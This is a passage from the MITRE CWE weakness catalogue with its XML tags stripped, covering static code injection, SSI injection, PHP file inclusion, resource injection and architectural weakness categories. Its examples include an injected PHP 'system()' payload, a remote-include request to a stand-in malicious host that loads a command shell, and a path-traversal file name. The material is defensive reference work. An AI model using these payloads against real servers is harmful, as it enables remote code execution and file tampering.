"NewMessage") {$name = $_GET["name"];$message = $_GET["message"];$handle = fopen($MessageFile, "a+");fwrite($handle, "<b>$name</b> says '$message'<hr>\n");fclose($handle);echo "Message Saved!<p>\n";}else if ($_GET["action"] == "ViewMessages") {include($MessageFile);} - - While the programmer intends for the MessageFile to only include data, an attacker can provide a message such as: - - name=h4x0rmessage=%3C?php%20system(%22/bin/ls%20-l%22);?%3E - - which will decode to the following: - - <?php system("/bin/ls -l");?> - - The programmer thought they were just including the contents of a regular data file, but PHP parsed it and executed the code. Now, this code is executed any time people view messages. - Notice that XSS (CWE-79) is also possible in this situation. - - - - - CVE-2002-0495 - Perl code directly injected into CGI library file from parameters to another CGI program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0495 - - - CVE-2005-1876 - Direct PHP code injection into supporting template file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1876 - - - CVE-2005-1894 - Direct code injection into PHP script that can be accessed by attacker. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1894 - - - CVE-2003-0395 - PHP code from User-Agent HTTP header directly inserted into log file implemented as PHP script. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0395 - - - CVE-2007-6652 - chain: execution after redirect allows non-administrator to perform static code injection. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6652 - - - - File or Directory - - - - Direct Static Code Injection - - - - - - - - - - - "HTML injection" (see CWE-79: XSS) could be thought of as an example of this, but the code is injected and executed on the client side, not the server side. Server-Side Includes (SSI) are an example of direct static code injection. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Observed_Examples - - - CWE Content Team - MITRE - 2014-06-23 - updated Enabling_Factors_for_Exploitation, Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - Direct Static Code Injection - Insufficient Control of Directives in Statically Saved Code (Static Code Injection) - Improper Sanitization of Directives in Statically Saved Code ('Static Code Injection') - - - - The software generates a web page, but does not neutralize or incorrectly neutralizes user-controllable input that could be interpreted as a server-side include (SSI) directive. - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Confidentiality - Integrity - Availability - Execute Unauthorized Code or Commands - - - - - Server-Side Includes (SSI) Injection - - - 36 - SSI Injection - - - - - - - - This can be resultant from XSS/HTML injection because the same special characters can be involved. However, this is server-side code execution, not client-side. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Name, Type - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - Server-Side Includes (SSI) Injection - Failure to Sanitize Server-Side Includes (SSI) Within a Web Page - - - - The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions. - In certain versions and configurations of PHP, this can allow an attacker to specify a URL to a remote location from which the software will obtain the code to execute. In other cases in association with path traversal, the attacker can specify a local file that may contain executable statements that can be parsed by PHP. - - - - - - - - - - - - Remote file include - - - RFI - The Remote File Inclusion (RFI) acronym is often used by vulnerability researchers. - - - Local file inclusion - This term is frequently used in cases in which remote download is disabled, or when the first part of the filename is not under the attacker's control, which forces use of relative path traversal (CWE-23) attack techniques to access files that may contain previously-injected PHP code, such as web access logs. - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Architecture and Design - - - High - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - The attacker may be able to specify arbitrary code to be executed from a remote location. Alternatively, it may be possible to use normal program behavior to insert php code into files on the local machine which can then be included and force the code to execute since php ignores everything in the file except for the content between php specifiers. - - - - - Manual Analysis - Manual white-box analysis can be very effective for finding this issue, since there is typically a relatively small number of include or require statements in each program. - High - - - Automated Static Analysis - - The external control or influence of filenames can often be detected using automated static analysis that models data flow within the software. - Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes. If the program uses a customized input validation library, then some tools may allow the analyst to create custom signatures to detect usage of those routines. - - - - - - Architecture and Design - Libraries or Frameworks - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - - - Architecture and Design - Enforcement by Conversion - - When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. - For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-185] provide this capability. - - - - Architecture and Design - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - - - Architecture and Design - Operation - Sandbox or Jail - - Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. - OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. - This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. - Be careful to avoid CWE-243 and other weaknesses related to jails. - - Limited - The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. - - - Architecture and Design - Operation - Environment Hardening - Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent lists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - High - - - Architecture and Design - Operation - Attack Surface Reduction - - Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately. - This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface. - - - - Architecture and Design - Implementation - Attack Surface Reduction - - Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls. - Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components. - - - - Operation - Firewall - Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth. - Moderate - An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization. - - - Operation - Implementation - Environment Hardening - Develop and run your code in the most recent versions of PHP available, preferably PHP 6 or later. Many of the highly risky features in earlier PHP interpreters have been removed, restricted, or disabled by default. - - - Operation - Implementation - Environment Hardening - - When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues. - Often, programmers do not protect direct access to files intended only to be included by core programs. These include files may assume that critical variables have already been initialized by the calling program. As a result, the use of register_globals combined with the ability to directly access the include file may allow attackers to conduct file inclusion attacks. This remains an extremely common pattern as of 2009. - - - - Operation - Environment Hardening - Set allow_url_fopen to false, which limits the ability to include files from remote locations. - High - Be aware that some versions of PHP will still accept ftp:// and other URI schemes. In addition, this setting does not protect the code from path traversal attacks (CWE-22), which are frequently successful against the same vulnerable code that allows remote file inclusion. - - - - - The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it. - - $dir = $_GET['module_name'];include($dir . "/function.php"); - - The problem with the above code is that the value of $dir is not restricted in any way, and a malicious user could manipulate the 'module_name' parameter to force inclusion of an unanticipated file. For example, an attacker could request the above PHP page (example.php) with a 'module_name' of "http://malicious.example.com" by using the following request string: - - victim.php?module_name=http://malicious.example.com - - Upon receiving this request, the code would set 'module_name' to the value "http://malicious.example.com" and would attempt to include http://malicious.example.com/function.php, along with any malicious code it contains. - For the sake of this example, assume that the malicious version of function.php looks like the following: - - system($_GET['cmd']); - - An attacker could now go a step further in our example and provide a request string as follows: - - victim.php?module_name=http://malicious.example.com&cmd=/bin/ls%20-l - - The code will attempt to include the malicious function.php file from the remote site. In turn, this file executes the command specified in the 'cmd' parameter from the query string. The end result is an attempt by tvictim.php to execute the potentially malicious command, in this case: - - /bin/ls -l - - Note that the above PHP example can be mitigated by setting allow_url_fopen to false, although this will not fully protect the code. See potential mitigations. - - - - - CVE-2004-0285 - Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0285 - - - CVE-2004-0030 - Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0030 - - - CVE-2004-0068 - Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0068 - - - CVE-2005-2157 - Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2157 - - - CVE-2005-2162 - Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2162 - - - CVE-2005-2198 - Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2198 - - - CVE-2004-0128 - Modification of assumed-immutable variable in configuration script leads to file inclusion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0128 - - - CVE-2005-1864 - PHP file inclusion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1864 - - - CVE-2005-1869 - PHP file inclusion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1869 - - - CVE-2005-1870 - PHP file inclusion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1870 - - - CVE-2005-2154 - PHP local file inclusion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2154 - - - CVE-2002-1704 - PHP remote file include. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1704 - - - CVE-2002-1707 - PHP remote file include. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1707 - - - CVE-2005-1964 - PHP remote file include. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1964 - - - CVE-2005-1681 - PHP remote file include. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1681 - - - CVE-2005-2086 - PHP remote file include. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2086 - - - CVE-2004-0127 - Directory traversal vulnerability in PHP include statement. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0127 - - - CVE-2005-1971 - Directory traversal vulnerability in PHP include statement. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1971 - - - CVE-2005-3335 - PHP file inclusion issue, both remote and local; local include uses ".." and "%00" characters as a manipulation, but many remote file inclusion issues probably have this vector. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3335 - - - CVE-2009-1936 - chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1936 - - - - File or Directory - - - - PHP File Include - - - A3 - Malicious File Execution - CWE More Specific - - - 5 - Remote File Inclusion - - - - - - - - - - - - - - - This is frequently a functional consequence of other weaknesses. It is usually multi-factor with other factors (e.g. MAID), although not all inclusion bugs involve assumed-immutable data. Direct request weaknesses frequently play a role. - Can overlap directory traversal in local inclusion problems. - - Under-researched and under-reported. Other interpreted languages with "require" and "include" functionality could also product vulnerable applications, but as of 2007, PHP has been the focus. Any web-accessible language that uses executable file extensions is likely to have this type of issue, such as ASP, since .asp extensions are typically executable. Languages such as Perl are less likely to exhibit these problems because the .pl extension isn't always configured to be executable by the web server. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Relationship_Notes, Research_Gaps, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2009-12-28 - updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Likelihood_of_Exploit, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2010-02-16 - Critical - converted from Compound_Element to Weakness - - - CWE Content Team - MITRE - 2010-02-16 - updated Alternate_Terms, Common_Consequences, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2013-02-21 - updated Alternate_Terms, Name, Observed_Examples - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations - - PHP File Inclusion - Insufficient Control of Filename for Include/Require Statement in PHP Program (aka 'PHP File Inclusion') - Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion') - - - - The software receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control. - - A resource injection issue occurs when the following two conditions are met: - - - An attacker can specify the identifier used to access a system resource. For example, an attacker might be able to specify part of the name of a file to be opened or a port number to be used. - By specifying the resource, the attacker gains a capability that would not otherwise be permitted. For example, the program may give the attacker the ability to overwrite the specified file, run with a configuration controlled by the attacker, or transmit sensitive information to a third-party server. - - - This may enable an attacker to access or modify otherwise protected system resources. - - - - - - - - - Primary - - - - - - - - Insecure Direct Object Reference - OWASP uses this term, although it is effectively the same as resource injection. - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - High - - - Confidentiality - Integrity - Read Application Data - Modify Application Data - Read Files or Directories - Modify Files or Directories - An attacker could gain access to or modify sensitive data or system resources. This could allow access to protected files or directories including configuration files and files containing sensitive information. - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, it can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - - - The following Java code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as "../../tomcat/conf/server.xml", which causes the application to delete one of its own configuration files. - - String rName = request.getParameter("reportName");File rFile = new File("/usr/local/apfr/reports/" + rName);...rFile.delete(); - - - - The following code uses input from the command line to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can create soft links to the file, they can use the program to read the first part of any file on the system. - - ifstream ifs(argv[0]);string s;ifs >> s;cout << s; - - The kind of resource the data affects indicates the kind of content that may be dangerous. For example, data containing special characters like period, slash, and backslash, are risky when used in methods that interact with the file system. (Resource injection, when it is related to file system resources, sometimes goes by the name "path manipulation.") Similarly, data that contains URLs and URIs is risky for functions that create remote connections. - - - - - Resource Injection - - - SFP24 - Tainted input to command - - - ASCSM-CWE-99 - - - - - - - - - - - - - Resource injection that involves resources stored on the filesystem goes by the name path manipulation (CWE-73). - The relationship between CWE-99 and CWE-610 needs further investigation and clarification. They might be duplicates. CWE-99 "Resource Injection," as originally defined in Seven Pernicious Kingdoms taxonomy, emphasizes the "identifier used to access a system resource" such as a file name or port number, yet it explicitly states that the "resource injection" term does not apply to "path manipulation," which effectively identifies the path at which a resource can be found and could be considered to be one aspect of a resource identifier. Also, CWE-610 effectively covers any type of resource, whether that resource is at the system layer, the application layer, or the code layer. - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - KDM Analytics - 2009-07-17 - Improved the White_Box_Definition - - - CWE Content Team - MITRE - 2009-07-27 - updated White_Box_Definitions - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Other_Notes - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Alternate_Terms, Maintenance_Notes, Other_Notes, Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Alternate_Terms, Description, Relationship_Notes, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, White_Box_Definitions - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Other_Notes, Potential_Mitigations, References, Relationships, Type - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - Resource Injection - Insufficient Control of Resource Identifiers (aka 'Resource Injection') - - - - - - This category has been deprecated. It was originally used for organizing the Development View (CWE-699), but it introduced unnecessary complexity and depth to the resulting tree. - - - Landwehr - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Maintenance_Notes, Name, Type - - Location - - - - This category has been deprecated. It added unnecessary depth and complexity to its associated views. - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationships, Taxonomy_Mappings, Type - - ASP.NET Environment Issues - - - - This category has been deprecated. It was originally intended as a "catch-all" for input validation problems in technologies that did not have their own CWE, but introduces unnecessary depth to the hierarchy. - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-10-15 - changed from weakness to category, updated Relationships, added Taxonomy_Mapping - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type - - Technology-Specific Input Validation Problems - - - - This category identifies Software Fault Patterns (SFPs) within the Use of an Improper API cluster (SFP3). - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Unexpected Entry Points cluster. - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category represents one of the phyla in the Seven Pernicious Kingdoms vulnerability classification. It includes weaknesses that exist when an application does not properly validate or represent input. According to the authors of the Seven Pernicious Kingdoms, "Input validation and representation problems are caused by metacharacters, alternate encodings and numeric representations. Security problems result from trusting input." - - - - - - - - - - - - - 7 Pernicious Kingdoms - 2017-05-05 - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, References - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - Seven Pernicious Kingdoms Category: Input Validation and Representation - - - - Weaknesses in this category are related to coding practices that are deemed unsafe and increase the chances that an exploitable vulnerability will be present in the application. These weaknesses do not directly introduce a vulnerability, but indicate that the product has not been carefully developed or maintained. If a program is complex, difficult to maintain, not portable, or shows evidence of neglect, then there is a higher likelihood that weaknesses are buried in the code. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2017-06-29 - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - Weaknesses in this category are related to the design and architecture of audit-based components of the system. Frequently these deal with logging user activities in order to identify attackers and modifications to the system. The weaknesses in this category could lead to a degradation of the quality of the audit capability if they are not addressed when designing or implementing a secure architecture. - - - - - - - - - - - - - - - Joanna C.S. Santos, Mehdi Mirakhorli - 2017-06-22 - Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. - - - - - This category has been deprecated. It was originally used for organizing the Development View (CWE-69 9), but it introduced unnecessary complexity and depth to the resulting tree. - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Type - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Description, Name, Relationships, Type - - Struts Validation Problems - - - - Weaknesses in this category are related to the design and architecture of authentication components of the system. Frequently these deal with verifying the entity is indeed who it claims to be. The weaknesses in this category could lead to a degradation of the quality of authentication if they are not addressed when designing or implementing a secure architecture. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Joanna C.S. Santos, Mehdi Mirakhorli - 2017-06-22 - Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. - - - - - Weaknesses in this category are related to the design and architecture of a system's authorization components. Frequently these deal with enforcing that agents have the required permissions before performing certain operations, such as modifying data. The weaknesses in this category could lead to a degradation of quality of the authorization capability if they are not addressed when designing or implementing a secure architecture. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Joanna C.S. Santos, Mehdi Mirakhorli - 2017-06-22 - Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - Weaknesses in this category are related to the design and architecture of multiple security tactics and how they affect a system. For example, information exposure can impact the Limit Access and Limit Exposure security tactics. The weaknesses in this category could lead to a degradation of the quality of many capabilities if they are not addressed when designing or implementing a secure architecture. - - - - - - - - - - - - - - - - - - Joanna C.S. Santos, Mehdi Mirakhorli - 2017-06-22 - Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. - - - - - Weaknesses in this category are related to the design and architecture of data confidentiality in a system. Frequently these deal with the use of encryption libraries. The weaknesses in this category could lead to a degradation of the quality data encryption if they are not addressed when designing or implementing a secure architecture. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Joanna C.S. Santos, Mehdi Mirakhorli - 2017-06-22 - Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - Weaknesses in this category are related to the design and architecture of a system's identification management components. Frequently these deal with verifying that external agents provide inputs into the system. The weaknesses in this category could lead to a degradation of the quality of identification management if they are not addressed when designing or implementing a secure architecture. - - - - - - - - - - - - - - - - - - - - - Joanna C.S. Santos, Mehdi Mirakhorli - 2017-06-22 - Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - Weaknesses in this category are related to the design and architecture of system resources. Frequently these deal with restricting the amount of resources that are accessed by actors, such as memory, network connections, CPU or access points. The weaknesses in this category could lead to a degradation of the quality of authentication if they are not addressed when designing or implementing a secure architecture. - - - - - - - - - - - - - - - - - Joanna C.S. Santos, Mehdi Mirakhorli - 2017-06-22 - Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. - - - - - Weaknesses in this category are related to the design and architecture of the entry points to a system. Frequently these deal with minimizing the attack surface through designing the system with the least needed amount of entry points. The weaknesses in this category could lead to a degradation of a system's defenses if they are not addressed when designing or implementing a secure architecture. - - - - - - - - - - - - - - - Joanna C.S. Santos, Mehdi Mirakhorli - 2017-06-22 - Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. - - - - - Weaknesses in this category are related to the design and architecture of a system's lockout mechanism. Frequently these deal with scenarios that take effect in case of multiple 